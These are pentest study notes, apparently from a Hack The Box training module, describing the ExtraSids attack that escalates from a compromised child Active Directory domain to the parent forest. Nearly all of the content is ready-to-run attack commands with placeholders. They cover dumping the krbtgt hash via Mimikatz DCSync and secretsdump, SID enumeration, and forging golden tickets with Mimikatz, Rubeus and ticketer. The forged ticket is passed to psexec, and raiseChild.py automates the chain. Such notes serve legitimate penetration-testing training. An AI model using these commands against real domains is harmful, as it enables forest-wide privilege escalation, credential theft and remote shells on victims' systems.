Attacking Domain Trusts

ExtraSids

This attack allows for the compromise of a parent domain once the child domain has been compromised. The sidHistory attribute is used in migration scenarios. If a user in one domain is migrated to another domain, a new account is created in the second domain. The original user's SID will be added to the new user's SID history attribute, ensuring that the user can still access resources in the original domain. An attacker can perform SID history injection (due to a lack of SID Filtering protection) and add an administrator account to the SID History attribute of an account they control in the child domain. When logging in with this account, all of the SIDs associated with the account are added to the user's token. This token is used to determine what resources the account can access.

We need:

1. FQDN - child domain

2. KRBTGT hash - child domain

3. SID - child domain

4. USER - child domain (does not need to exist)

5. SID Enterprise Admin group - root domain

Locally - Windows

Get Data

2 - 3 with Mimikatz (Since we have compromised the child domain, we can log in as a Domain Admin or similar and perform the DCSync attack to obtain the NT hash for the KRBTGT account)

lsadump::dcsync /user:<CHILD_DOMAIN>\krbtgt
# take note of Domain SID (Security ID - Relative ID)

3 - 5 with Old and New PowerView

Get-DomainSID

Get-DomainGroup -Domain <DOMAIN> -Identity "Enterprise Admins" | select distinguishedname,objectsid

5 with cmdlet Get-ADGroup

Get-ADGroup -Identity "Enterprise Admins" -Server "<DOMAIN>"

Mimikatz

With Mimikatz, create a Golden Ticket to access all resources within the parent domain

mimikatz.exe
> kerberos::golden /user:<NEW_USER> /domain:<FQDN_CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /krbtgt:<HASH> /sids:<ENTERPRISE_ADMIN_SID> /ptt

check

klist
ls \\<MACHINE_DC>.<DOMAIN_ROOT>\c$

Rebeus

With Rubeus, create a Golden Ticket to access all resources within the parent domain

.\Rubeus.exe golden /rc4:<HASH> /domain:<FQDN_CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID>  /sids:<ENTERPRISE_ADMIN_SID> /user:<NEW_USER> /ptt

check

klist
ls \\<MACHINE_DC>.<DOMAIN_ROOT>\c$

Remotely - Linux

Get Data

2 with impacket-secretsdump

secretsdump.py <FULL_CHILD_DOMAIN>/<USER>@<DC> -just-dc-user <CHILD_DOMAIN>/krbtgt
# secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

3 - 4 with impacket-lookupsid.py (bruteforce SID)

lookupsid.py <FULL_CHILD_DOMAIN>/<USER>@<DC_CHILD> | grep "Domain SID"

lookupsid.py <FULL_CHILD_DOMAIN>/<USER>@<DC_ROOT> | grep "Domain SID"
lookupsid.py <FULL_CHILD_DOMAIN>/<USER>@<DC_ROOT> | grep "Enterprise Admins"
# <Domain_SID>-<RID_EnterpriseAdmin>

Ticketer

Use impacket-icketer.py to construct a Golden Ticket. This ticket will be valid to access resources in the child domain (specified by -domain-sid) and the parent domain (specified by -extra-sid).

ticketer.py -nthash <HASH> -domain <FULL_CHILD_DOMAIN> -domain-sid <CHILD_DOMAIN_SID> -extra-sid <ROOT_EnterpriseAdmin_SID> <NEW_USER>

Now import the ticket and use it

export KRB5CCNAME=<PATH_TO_FILE>.ccache 

psexec.py <FULL_CHILD_DOMAIN>/<NEW_USER>@<MACHINE_NAME>.<DOMAIN> -k -no-pass -target-ip <MACHINE_IP>

RaiseChild

USe raiseChild.py to automate the process

raiseChild.py -target-exec <MACHINE_IP> <FULL_CHILD_DOMAIN>/<USER_ADMIN>

Workflow

Input:

1. Child-domain Admin credentials (password, hashes or aesKey) in the form of 'domain/username[:password]' The domain specified MUST be the domain FQDN.

2. Optionally a pathname to save the generated golden ticket (-w switch)

3. Optionally a target-user RID to get credentials (-targetRID switch) Administrator by default.

4. Optionally a target to PSEXEC with the target-user privileges to (-target-exec switch). Enterprise Admin by default.

Process:

1. Find out where the child domain controller is located and get its info (via [MS-NRPC])

2. Find out what the forest FQDN is (via [MS-NRPC])

3. Get the forest's Enterprise Admin SID (via [MS-LSAT])

4. Get the child domain's krbtgt credentials (via [MS-DRSR])

5. Create a Golden Ticket specifying SID from 3) inside the KERB_VALIDATION_INFO's ExtraSids array and setting expiration 10 years from now

6. Use the generated ticket to log into the forest and get the target user info (krbtgt/admin by default)

7. If file was specified, save the golden ticket in ccache format

8. If target was specified, a PSEXEC shell is launched

Output:

1. Target user credentials (Forest's krbtgt/admin credentials by default)

2. A golden ticket saved in ccache for future fun and profit

3. PSExec Shell with the target-user privileges (Enterprise Admin privileges by default) at target-exec parameter.